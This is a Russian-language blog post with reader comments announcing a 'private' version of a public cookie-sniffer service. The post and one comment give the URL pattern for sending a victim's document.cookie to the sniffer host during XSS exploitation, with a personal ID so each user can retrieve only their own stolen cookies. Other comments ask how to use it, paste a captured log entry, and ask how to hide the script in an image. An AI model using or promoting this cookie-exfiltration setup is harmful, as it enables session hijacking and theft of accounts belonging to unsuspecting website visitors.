Home Blog Уходим в private: приватная версия Cookies Sniffer

Уходим в private: приватная версия Cookies Sniffer

by Denis Makrushin
393 views

Private Cookies Sniffer

С ростом количества пользователей сервиса растут потребности в расширении его функционала. Основная задача: не отходя от концепции общедоступности к принуждению в массовом порядке всех регистрироваться на сайте, сделать private-версию из публичного снифера кукис-файлов. 

В русскоязычном сегменте Сети повсеместная распространенность public-сниферов компенсируется практически полным отсутствием их приватных аналогов. «Практически полным» – если не считать сервисы, требующие регистрации.

В результате небольших манипуляций, уже имеющийся Cookies Sniffer превращается в Cookies Sniffer с возможностью индивидуального подхода к пользователю. Без регистрации на сайте. Использовать эту возможность можно с помощью формы, расположенной на странице с сервисом.

Инструкция по эксплуатации

В поле “Code” пользователь вводит свой уникальный идентификатор (пока состоящий максимум из 10 символов), который позволяет из общей «свалки» закрытых логов выбрать записи, принадлежащие именно владельцу кода:

Usercode Example

В свою очередь, для того, чтобы записи попали в лог-файл следует изменить адрес снифера на ссылку, содержащую уникальный код:

http://defectech.ru/sniff/snf?idusercodeid

где usercode – Ваш уникальный идентификатор (придумывается Вами).

Таким образом, при эксплуатации XSS-уязвимости ссылка должна иметь примерно следующий вид:

http://defectech.ru/sniff/snf?idusercodeid+document.cookie()…

Далее, для получения принадлежащих Вам логов, необходимо в поле “Code” формы, расположенной на странице сниффера, ввести свой код.

You may also like

10 comments

Гость January 23, 2011 - 15:48

Очень благодарен всем создателям сайта!!Активно пользуюсь вашим сервисом!

Reply
bluf1985 March 20, 2011 - 13:43

Плиз объясните, где долгожданные куки……

15:54:11 20.03.2011
Referer:
Query: idbluf1985id
IP: 109.233.236.91
User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; InfoPath.2)

не въезжаю… До этого другим пользовался там все проще было, но он палится( Объясните где они, оч. надо……

Reply
ilya67 April 17, 2011 - 08:22

ну че не понятно!

Reply
BlackStap April 19, 2011 - 04:39

Ну дак а как свой идентификатор создать то?

Reply
c0n Difesa May 2, 2011 - 08:56

Идентификатор прописывается в ссылке, которая отправляет данные пользователя на снифер. Например: http://defectech.ru/sniff/snf?idblackstappassid+document.cookie(). Таким образом прилетевшие кукисы фиксируются в контейнере логов blackstappass. Далее, для просмотра содержимого данного контейнера в поле “Code” вводится “blackstappass”.

Reply
Sonick April 20, 2011 - 14:26

Проблема еще сохранилась?

Reply
aleksey66670 September 26, 2011 - 07:58

как привязать скрипт к картинке???

Reply
Гость November 27, 2011 - 02:16

СЕРВИС – ГАВНО!
Они фильтруют все значения с “User=” и показывают только “U”.

Reply
c0n Difesa November 27, 2011 - 07:51

Сервис демонстрирует данные в таком виде, в котором они поступили на вход.

Reply
Гость December 5, 2014 - 12:27

Вписую свой id – перекидывет на пустую страницу.

Reply

Leave a Comment